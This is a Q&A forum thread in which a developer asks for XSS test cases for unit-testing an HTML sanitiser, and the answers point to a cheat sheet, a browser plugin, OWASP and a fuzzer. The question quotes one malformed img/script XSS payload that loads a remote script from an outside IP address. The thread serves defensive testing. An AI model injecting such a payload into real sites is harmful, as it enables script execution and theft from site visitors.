up vote 15 down vote favorite
10
share [g+] share [fb]

I'm looking to write a html sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

I know there's a Mime Torture Test which comprises of several nested emails with attachments that's used to test Mime decoders (if they can decode it properly, then they've been proven to work). I'm basically looking for an equivilent for XSS, i.e. a list of examples of dodgy html that I can throw at my sanitiser just to make sure it works OK.

If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they'd be gratefully received too.

Thanks in advance :-)

Edit: Sorry if this wasn't clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere - not just a browser.

link|improve this question

feedback

5 Answers

up vote 14 down vote accepted

Take a look at this XSS Cheat List : http://ha.ckers.org/xss.html

link|improve this answer
Specifically the "XML format of the XSS Cheat Sheet", which I missed the first time I saw that page.. – dbr Nov 2 '08 at 13:29
feedback

XSS Me is a great Firefox plugin you can run against your sanitizer.

link|improve this answer
The link to "XSS Me" is formatted wrong... The correct URL is addons.mozilla.org/en-US/firefox/addon/7598 – Patjoh Nov 1 '08 at 16:35
Link corrected. Thanks for pointing it out! – Maxam Nov 1 '08 at 16:38
It is outdated, does not work with the latest version of FireFox – boyd4715 Jun 21 '11 at 14:56
feedback

Check out OWASP. They have good guidance on how XSS works, what to look for, and even the WebGoat project, where you can try your hand on a vulnerable site.

link|improve this answer
feedback

You might try Jesse Ruderman's jsfunfuzz (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/) that throws random data at your Javascript trying to break it. It seems the Firefox team has used this with great success.

link|improve this answer
feedback

I know Yahoo! (I think Rasmus Lerdorf wrote it) had a utility for stress testing applications (XSS, SQL and a lot more). I think it was released and then retracted, seeing as I haven't been able to find it anywhere.

link|improve this answer
feedback

Your Answer

 
or
required, but never shown

Not the answer you're looking for? Browse other questions tagged or ask your own question.